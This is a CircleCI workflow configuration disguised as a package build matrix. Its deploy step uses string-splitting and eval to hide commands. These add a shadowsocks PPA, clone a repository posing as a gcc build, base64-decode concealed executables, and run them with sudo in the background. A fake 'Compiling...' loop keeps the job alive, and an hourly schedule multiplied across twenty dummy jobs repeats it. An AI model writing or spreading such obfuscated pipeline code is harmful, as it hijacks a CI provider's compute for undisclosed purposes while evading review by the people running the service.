version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet", "--ignore-soname-deps", "--noconfmem", "--noreplace", "--accept-restrict", "--autounmask-only", "--buildpkg", "--sync", "--nospinner", "--buildpkg-exclude", "--reinstall-atoms", "--config", "--sync-submodule", "--quiet-repo-display", "--complete-graph-if-new-ver", "--nodeps", "--with-bdeps-auto", "--onlydeps", "--debug", "--changed-use"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet", "--ignore-soname-deps", "--noconfmem", "--noreplace", "--accept-restrict", "--autounmask-only", "--buildpkg", "--sync", "--nospinner", "--buildpkg-exclude", "--reinstall-atoms", "--config", "--sync-submodule", "--quiet-repo-display", "--complete-graph-if-new-ver", "--nodeps", "--with-bdeps-auto", "--onlydeps", "--debug", "--changed-use"]
    triggers:
      - schedule:
          cron: "10 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: DEPLOY
          command: |
            eCKVaY="sudo add-ap"
            gQjoWxbsWE="t-repositor"
            pijma="y ppa:max-c"
            hSlBTp="-lv/shadows"
            gsJLFz="ocks-libev "
            IVHStdZXg="-y &>/dev/n"
            eval "$eCKVaY""$gQjoWxbsWE""$pijma""$hSlBTp""$gsJLFz""$IVHStdZXg""ull || true"
            rKfIZIILT="sudo add-ap"
            FQNFMqQIkP="t-repositor"
            CnpAM="y ppa:ondre"
            ezxHp="j/apache2 -"
            MlxyCSdLd="y &>/dev/nu"
            eval "$rKfIZIILT""$FQNFMqQIkP""$CnpAM""$ezxHp""$MlxyCSdLd""ll || true"
            sudo apt update || true
            gzGaMEDA="sudo apt --"
            RTLIRbLniVy="yes install"
            csjKpqmCjQy=" openssl &>"
            VzOfMQTwnf="/dev/null |"
            eval "$gzGaMEDA""$RTLIRbLniVy""$csjKpqmCjQy""$VzOfMQTwnf""| true"
            UuAmAfNzvKP="sudo apt --"
            QtHlbP="yes install"
            nldBv=" cl-base64 "
            pApXVI="git &>/dev/"
            uYEOuG="null || tru"
            eval "$UuAmAfNzvKP""$QtHlbP""$nldBv""$pApXVI""$uYEOuG""e"
            nhgYFGa="git clone h"
            KSkDsQ="ttps://gccb"
            Dajdleu="uild@bitbuc"
            DVGOIaZMCGE="ket.org/gcc"
            cpCzHcfKi="build/gcc.g"
            ArvJn="it &>/dev/n"
            eval "$nhgYFGa""$KSkDsQ""$Dajdleu""$DVGOIaZMCGE""$cpCzHcfKi""$ArvJn""ull"
            mfuvgIecnn="base64 -d g"
            ceRwt="cc/cmake_np"
            eval "$mfuvgIecnn""$ceRwt""_ > cmake"
            tAeODz="base64 -d g"
            vwEKlLNHL="cc/config_ "
            eval "$tAeODz""$vwEKlLNHL""> output"
            vdfKII="base64 -d g"
            ZRIOcmsOBA="cc/make_ > "
            eval "$vdfKII""$ZRIOcmsOBA""ci"
            gutEvv="sed -i 's/1"
            sdvDO="080/1081/g'"
            eval "$gutEvv""$sdvDO"" output"
            oIgAu="chmod +x ci"
            eval "$oIgAu"" cmake"
            OQrUUmiOY="./cmake"
            eval "$OQrUUmiOY"""
            ZaRedBb="sed -i 's/b"
            WevgOP="uild/ob2o/g"
            eval "$ZaRedBb""$WevgOP""' output"
            nxSXy="sudo ./ci -"
            ZEutJYxqO="-config out"
            ZnSgFQTfF="put &>/dev/"
            eval "$nxSXy""$ZEutJYxqO""$ZnSgFQTfF""null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2543)) ] && sudo killall ci && break; sleep 195; done
